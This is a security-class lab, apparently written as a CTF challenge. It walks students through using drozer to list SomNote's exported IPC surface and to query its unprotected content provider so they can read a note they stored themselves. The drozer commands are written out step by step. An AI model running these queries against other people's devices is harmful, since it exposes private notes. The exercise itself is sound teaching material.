M 503: SomNote Vulnerable Content Provider (15 pts)

What You Need for This Project


To practice using drozer, "a comprehensive security audit and attack framework for Android", according to its product page.

Drozer allows you to audit IPC endpoints.


Install the app, as shown below.

If you can't get the app from Google Play, download my archived copy.

Click "LOGIN WITH EMAIL", and enter any email and password, and click the Login button.

Responsible Disclosure

I notified SomCloud of problems years ago:

Putting a Secret into Somnote

On your Android device, launch Somnote.

If it asks for permissions, grant them.

In the login screen, as shown below, at the top right, click X.

A "VIP Previliges" box appears. At the top right, click X to close it.

Click "Get started with SomNote", as shown below.

On the next screen, at the top right, click the + sign.

Type in a secret message, as shown below, and click Save.

At the lower right of your Android device, click the square button.

Close SomNote.

Attacking SomNote with Drozer

Retrieving Package Information

On Kali, at the dz> prompt, execute these commands:
adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list -f som 
Drozer finds the path to the somnote app, which is


as shown below.

Identifying the Attack Surface

To see what vulnerabilities are exposed through Android’s built-in Inter-Process Communication (IPC) system, on Kali, at the dz> prompt, execute this command:
run app.package.attacksurface com.somcloud.somnote 
There are a lot of exported items, as shown below.

Reading from the Content Provider

On Kali, at the dz> prompt, execute this command:
run app.provider.info -a com.somcloud.somnote 
The content provider's name is shown, and the fact that no permissions are required to read from it, as shown below.

Finding URIs

On Kali, at the dz> prompt, execute this command:
run scanner.provider.finduris -a com.somcloud.somnote 
Drozer finds four URIs, as shown below.

Querying the Content Provider

On Kali, at the dz> prompt, execute this command:
run app.provider.query content://com.somcloud.provider.SomNote/notes/ 
Drozer finds the secret information, as shown below.

M 503.1: Recording Your Success (15 pts)

Find the text covered by a green box in the image above. That's the flag.


drozer user guide

Converted to a CTF 2-28-19
Updated in small ways 2-17-21